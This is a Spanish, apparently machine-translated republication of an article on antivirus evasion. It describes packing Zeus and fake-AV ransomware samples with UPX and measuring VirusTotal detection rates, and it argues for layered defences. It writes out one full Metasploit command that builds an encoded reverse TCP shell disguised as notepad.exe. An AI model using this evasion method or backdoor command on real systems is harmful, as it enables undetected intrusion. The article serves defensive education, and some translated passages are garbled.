Krypton Solid

Krypton Solid
Krypton Solid

La última tecnología en raciones de 5 minutos

Las técnicas de evasión de antivirus muestran facilidad para evitar la detección de antivirus

El antivirus para endpoints no funciona. Sí, el secreto ha salido a la luz: en una dramática disputa pública, el mayor proveedor de antivirus de la industria fue denunciado recientemente por no detectar y frustrar un ataque persistente avanzado. Por supuesto, esto no era realmente un secreto para los profesionales de la seguridad de la información, pero para muchos consumidores y, seguramente, algunos ejecutivos de nivel C, el evento reveló que sin tecnologías de seguridad adicionales, los antivirus ofrecen poca protección contra los ciberataques contemporáneos. Afortunadamente, este incidente ha arrojado luz sobre los métodos avanzados que los atacantes utilizan ahora para subvertir fácilmente los productos antimalware.

Para resumir brevemente, a finales de enero el New York Times reveló que había sido víctima de una campaña de ciberataques con sede en China, que había pasado desapercibida durante al menos cuatro meses. Se cree que los atacantes obtuvieron acceso inicial a la red mediante la suplantación de identidad, luego usaron credenciales válidas para abrirse camino a través de la red y en las computadoras de más de cuatro docenas de empleados, buscando identidades de fuentes de reporteros en historias que involucran al primer ministro chino.

AV falso ransomware

Las chispas empezaron a volar cuando el Veces informó que los atacantes habían instalado al menos 45 piezas de malware personalizado en su red, de las cuales solo uno fue detectado por los productos antimalware de Symantec Corp. instalados en sus sistemas. En un movimiento inusual, Symantec lanzó una respuesta en la que se destaca la importancia de capas adicionales de seguridad, como la tecnología basada en la reputación y el bloqueo basado en el comportamiento. La última línea de la declaración de Symantec fue el truco: «El software antivirus por sí solo no es suficiente».

Troyano Zeus

Symantec lo hizo bien. El antivirus por sí solo no puede proteger una red privada del malware, sin importar cuán sofisticadas o avanzadas sean las heurísticas. Ninguna empresa debería depender únicamente de la detección de antivirus porque los ciberdelincuentes ahora tienen demasiados métodos diferentes a su disposición para modificar los ejecutables. Examinaremos algunas de las técnicas avanzadas que utilizan los atacantes para mostrar cuán difícil y desconcertante puede ser para las empresas identificar los ataques de malware avanzado. Sin embargo, es importante tener en cuenta que todos los profesionales de la seguridad deben seguir investigando nuevos métodos a medida que vayan surgiendo; las técnicas utilizadas por los autores de malware están en constante evolución.

Paquete de ransomware AV falso

Ofuscación para evitar la detección

Una de las primeras técnicas que utilizan los atacantes para evitar la detección de antivirus es la compresión. Originalmente pensada para ayudar a los desarrolladores de aplicaciones a reducir el tamaño de sus archivos de programa para facilitar la distribución, los autores de malware utilizan la compresión para ofuscar el contenido del ejecutable. Mediante el uso de técnicas de compresión, los autores de malware descubrieron que podían modificar su código para evitar el software antivirus basado en firmas. Se pueden usar muchas aplicaciones para la compresión, pero una de las más populares se llama Ultimate Packer para ejecutables (UPX). Es de código abierto y está disponible en Sourceforge.

Utilicé esta técnica contra muestras de malware conocidas para demostrar la eficacia de la ofuscación mediante compresión. Encuentro útil mantener una colección de muestras de malware que he encontrado a lo largo de los años para probar nuevas defensas y validar estrategias de detección. Elegí dos de las cepas de malware más infames de mi colección. Una es una variante del troyano Zeus que llegó a través de los sistemas antivirus sin ser detectada en mayo de 2012. La segunda es una variante del ransomware increíblemente exitoso, que se asemeja a un antivirus falso y ha sido el flagelo de los servicios de asistencia de TI de todo el mundo.

Troyano Zeus empaquetado

Ambas muestras de malware más antiguas se pueden detectar fácilmente mediante firmas actualizadas de cualquier producto antivirus del mercado actual. Los ejecuté a través del servicio web gratuito en virustotal.com, que analiza archivos sospechosos y URL a través de hasta 46 motores antivirus diferentes. Los resultados de las pruebas fueron que Zeus fue detectado por 43 de los 46 motores antivirus, mientras que Fake-AV fue detectado por 42 de los 45.

Ejecuté ambos archivos a través de un empaquetador ejecutable y los archivos recientemente ofuscados a través del servicio virustotal.com, y comparé los resultados.

El troyano Zeus empaquetado pudo evadir otros 12 motores de detección de antivirus, lo cual era de esperar. El hallazgo inesperado es que varios motores antivirus importantes lo identificaban de manera diferente. El motor de Microsoft perdió por completo el archivo empaquetado, mientras que el motor de Symantec reclasificó el archivo como «Suspicious.SecTool».

Detección de Zeus empaquetada

Symantec no fue el único que reclasificó el tipo de malware detectado. Las siguientes listas muestran que, a excepción de McAfee, la mayoría de los motores antivirus conocidos también reclasificaron el malware. McAfee pudo detectar el malware a pesar de las modificaciones, que parecían prometedoras. La siguiente prueba fue verificar si a McAfee le iría bien con otra muestra de malware.

Los resultados de las pruebas de empaquetar el ransomware antivirus falso fueron incluso mejores que los resultados obtenidos con el troyano Zeus empaquetado. Tres motores antivirus más no detectaron por completo, lo que elevó el número total de errores esta vez a 15. Symantec resultó ser uno de los motores que no pudo detectar ningún malware del ejecutable de ransomware empaquetado, pero ciertamente no fue el único que se muestra en las tablas siguientes. ilustrar.

Tanto McAfee como Microsoft obtienen buenos resultados en esta prueba. Sin embargo, esto no implica que alguno de estos motores antivirus ofrezca una protección «mejor» que cualquier otro. La prueba solo consistió en dos archivos diferentes que se habían empaquetado usando una herramienta de compresión. Los resultados podrían ser completamente diferentes si se utilizan diferentes muestras de malware o herramientas de compresión. Esta prueba simplemente demuestra que es posible eludir los motores antivirus utilizando esta metodología. Todavía hay muchos otros métodos que se pueden utilizar para evitarlos todos.

Exploits de empaquetado con marcos de prueba de penetración

Detección de troyanos Zeus

Mi siguiente prueba utilizó el popular marco de pruebas de penetración Metasploit Community Edition. Esta herramienta es bien conocida por su desarrollo de contribución abierta y flexibilidad. La capacidad de empaquetar exploits o puertas traseras en archivos que podrían usarse en pruebas de penetración fue una característica clave que se agregó hace varios años. Esta herramienta puede crear muchos formatos de archivo populares, incluidos archivos PDF y todos los formatos estándar de Microsoft Office. También puede generar ejecutables, que se pueden crear a partir de archivos de programa predeterminados de Microsoft Windows. Es probable que un usuario desprevenido ejecute «notepad.exe» y no se dé cuenta de que se ha modificado. Así es como un probador de penetración puede evadir los motores antivirus y simula cómo los autores de malware generan código malicioso de apariencia realista.

Ejecuté varios ejecutables estándar de Microsoft Windows a través del siguiente comando para probar la tasa de detección de antivirus:

msfpayload windows / shell / reverse_tcp LHOST = 192.168.1.75 LPORT = 4444 R | msfencode -c 5 -e x86 / shikata_ga_nai -x notepad.exe> ​​notepad2.exe

El comando generó una puerta trasera TCP inversa estándar, que se conectaría al servidor de comando y control en 192.168.1.75 en el puerto 4444. Esto se canalizó al codificador, que corrió a través de cinco pases usando el codificador shikata ga nai. Esta frase significa «no se puede evitar» en japonés, pero también se refiere al codificador de retroalimentación aditiva polimórfica XOR utilizado por Metasploit para crear el ejecutable. El producto final, notepad2.exe, se generó utilizando notepad.exe como plantilla. La víctima ejecutaría notepad2.exe y crearía una conexión de puerta trasera al servidor C&C en 192.167.1.75.

Entonces llegó el momento de cargar y escanear notepad2.exe para probar las capacidades de detección de los mismos motores antivirus utilizados en las pruebas anteriores. Esta prueba fue un fracaso total para cada uno de los 46 motores antivirus disponibles en virustotal.com. Ninguno de ellos, incluidos Microsoft, Symantec, McAfee, identificó la puerta trasera que estaba codificada en este archivo. Sin embargo, esto no fue ninguna sorpresa. Era el resultado esperado para demostrar las limitaciones de los motores antivirus basados ​​en firmas. Deben haber visto el malware antes para poder detectarlo en el futuro.

AV falso empaquetado

Para ser claros, estas pruebas no son científicas y no implican que el antivirus sea inútil como defensa contra los ataques de malware moderno. Implica que el antivirus es solo una parte de una estrategia general de defensa en profundidad requerida para proteger los activos informáticos de la empresa, tal como lo escribió Symantec en su respuesta a la Veces artículo.

Tecnologías de capas sobre antimalware

Con ese fin, ahora es el momento de que los CISO actúen y presionen a sus organizaciones para que consideren colocar tecnologías adicionales sobre los sistemas antimalware. Por ejemplo, se puede combinar con la lista blanca para permitir que solo los programas aprobados se ejecuten en las máquinas cliente. Los firewalls de próxima generación, IPS / IDS y sistemas de filtrado web se pueden utilizar para detectar tráfico de red inusual, que casi siempre acompaña a las infecciones de malware. Por supuesto, ningún sistema puede ser eficaz sin la interpretación e intervención humanas, por lo que es fundamental que un profesional de seguridad bien capacitado tenga la responsabilidad de supervisar los sistemas de seguridad que se utilicen.

Detección de ransomeware AV

El antivirus ha recibido muchas críticas en la prensa recientemente, lo que ha llevado a la gente a preguntar nuevamente si el antivirus está muerto. El antivirus está vivo y coleando, pero solo debería ser una parte de una estrategia defensiva general. La facilidad con la que incluso los ataques más básicos pueden ofuscarse eficazmente, como se demostró anteriormente, es una prueba más de que la seguridad de la información efectiva nunca debe centrarse en un producto o capa de seguridad; pero logrado a través de un programa integral de gestión de riesgos que se basa en múltiples capas y tecnologías. El Veces incidente, y muchos otros similares, deberían servir como catalizador para que muchas organizaciones complementen el antimalware con la clase emergente de defensas auxiliares de hoy.

Sobre el Autor:
Joseph Granneman tiene más de 20 años de experiencia en tecnología y seguridad de la información, enfocada principalmente en TI para el cuidado de la salud.

También te puede interesar...

Verizon, socio de Microsoft en 5G edge

Verizon ha agregado Microsoft Azure como socio de la nube en la plataforma de computación de borde 5G del operador para minoristas, fabricantes y otras industrias con aplicaciones que requieren una latencia ultrabaja para los

Configuración de Windows Server 2008 Server Core

Configurar la posinstalación de Server Core Acerca del libro: Este extracto de capítulo sobre cómo configurar y administrar Server Core (descargar PDF) está tomado del libro Procedimientos de Windows Server 2008Este libro ofrece información sobre

Las muchas caras de IoT

Ha habido años de exageración generada en torno a tecnologías innovadoras de IoT que nunca antes imaginamos posibles. Desde equipos de fitness conectados hasta guantes industriales inteligentes y sistemas inteligentes de gestión del agua: las

¿Qué es la mensajería de dispositivos de Amazon?

Amazon Device Messaging (ADM) es una herramienta de servicios para desarrolladores de Amazon que permite a un desarrollador enviar notificaciones automáticas a los dispositivos nativos del usuario final que ejecutan una aplicación móvil, como un

Administrar la tecnología de SQL Server – Página 3

Aprenda a aplicar las mejores prácticas y optimizar sus operaciones. Ejemplo de desencadenador de SQL Server: EN LUGAR DE desencadenadores frente a DESPUÉS de desencadenadores Este ejemplo demuestra cuándo es mejor utilizar los desencadenadores INSTEAD

Schneider Electric cambia a un lugar de trabajo híbrido

Schneider Electric está terminando los arrendamientos de sus oficinas más pequeñas y trasladando a los empleados a las instalaciones de coworking. Quiere lugares de trabajo híbridos, ubicaciones flexibles y fáciles de escalar que puedan acomodar

¿Qué es Red Hat Atomic Host?

Red Hat Atomic Host es una variante del sistema operativo de código abierto compatible con Red Hat Enterprise Linux, diseñado para ser un sistema operativo mínimo con optimizaciones para el alojamiento de contenedores. Su nombre

MSP y recursos e información de ciberseguridad

MSP y ciberseguridad Noticias MSP y ciberseguridad Empezar Ponte al día con nuestro contenido introductorio Evaluar Proveedores y productos de MSP y ciberseguridad Sopese los pros y los contras de las tecnologías, los productos y

¿Qué es Microsoft System Center?

¿Qué es Microsoft System Center? Microsoft System Center es un conjunto de productos de administración de sistemas vendidos individualmente. Los productos principales del grupo son System Center Configuration Manager (SCCM, antes conocido como Systems Management

WANdisco, Azure bailan la migración de datos

WANdisco ha integrado su migración de big data con la nube de Microsoft Azure. La plataforma WANdisco LiveData para Azure, en versión preliminar para clientes, está diseñada para facilitar el traslado de petabytes de datos

¿Qué es la unión al dominio de Windows?

La unión de dominio de Windows es una función que permite a los usuarios establecer una conexión remota y segura a un dominio de trabajo utilizando credenciales de la empresa, lo que les permite «unirse»

Sistemas Hiperconvergentes para VDI

VDI se ha convertido en un gran activo para muchas organizaciones, pero algunas siguen preocupadas por hacer la transición. Afortunadamente, las nuevas opciones han hecho que el cambio sea suave y simple. Descubra cómo puede

¿Qué es Heroku? – Definición de Krypton Solid

Heroku es una plataforma de desarrollo basada en la nube como proveedor de servicios (PaaS). La plataforma Heroku admite el desarrollo en Ruby on Rails, Java, Node.js, Python, Scala y Clojure. Originalmente, Heroku solo admitía

¿Qué es Amazon Echo Look?

Amazon Echo Look es un asistente virtual de cámara y estilo para consumidores. Como parte de la línea Amazon Echo de dispositivos domésticos inteligentes para el consumidor, utiliza las capacidades de reconocimiento de voz de

Por qué Charmer Sunbelt Group sigue con SAP WM

¿Qué factores influyeron en la decisión de su empresa de permanecer con el software SAP Warehouse Management y no pasar a SAP Extended Warehouse Management, al menos por el momento? Creo que es solo la

¿Qué es VMware vCloud Air?

VMware vCloud Air es una oferta de infraestructura como servicio basada en vCenter de VMware. VMware cambió el nombre de su servicio de computación en la nube, que anteriormente se llamaba vCloud Hybrid Service, como

Cómo concatenar filas en un solo CLOB en PL/SQL

¿Cómo combinaría varias filas varchar2 en una fila de tipo CLOB? Ejemplo: crear la tabla A (número de claves, texto CLOB); crear la tabla B (número de claves, texto varchar2(100)); insertar en valores B (1,

¿Qué es AMOLED (matriz activa OLED)?

AMOLED (OLED de matriz activa) es una tecnología de pantalla basada en píxeles hechos de diminutos diodos emisores de luz (OLED) basados ​​en materiales orgánicos rojos, azules y verdes. La matriz activa denota un sistema

¿Qué es Windows NT? – Definición de Krypton Solid

Windows NT es un sistema operativo de computadora personal de Microsoft Windows diseñado para usuarios y empresas que necesitan capacidades avanzadas. La tecnología de NT es la base del sistema operativo sucesor de Microsoft, Windows

The Pipeline – SearchCustomerExperience

Cómo un punk rockero simplificaría CX Cuando la pila tecnológica y las métricas de medición complican demasiado la CX, destrúyela como un rockero punk, sugiere el autor británico Adrian Swinscoe en esta entrevista de podcast

¿Qué es Dialogflow? Definición de Krypton Solid

Dialogflow es una plataforma de procesamiento de lenguaje natural (NLP) que se puede utilizar para crear aplicaciones y experiencias conversacionales para los clientes de una empresa en varios idiomas y en múltiples plataformas. El producto

Cuestionario 201 de virtualización y gestión del aula

Este cuestionario le permite poner a prueba sus conocimientos sobre virtualización de servidores y cubre las plataformas de virtualización, las herramientas de gestión y el rendimiento de la infraestructura de virtualización.

Deja un comentario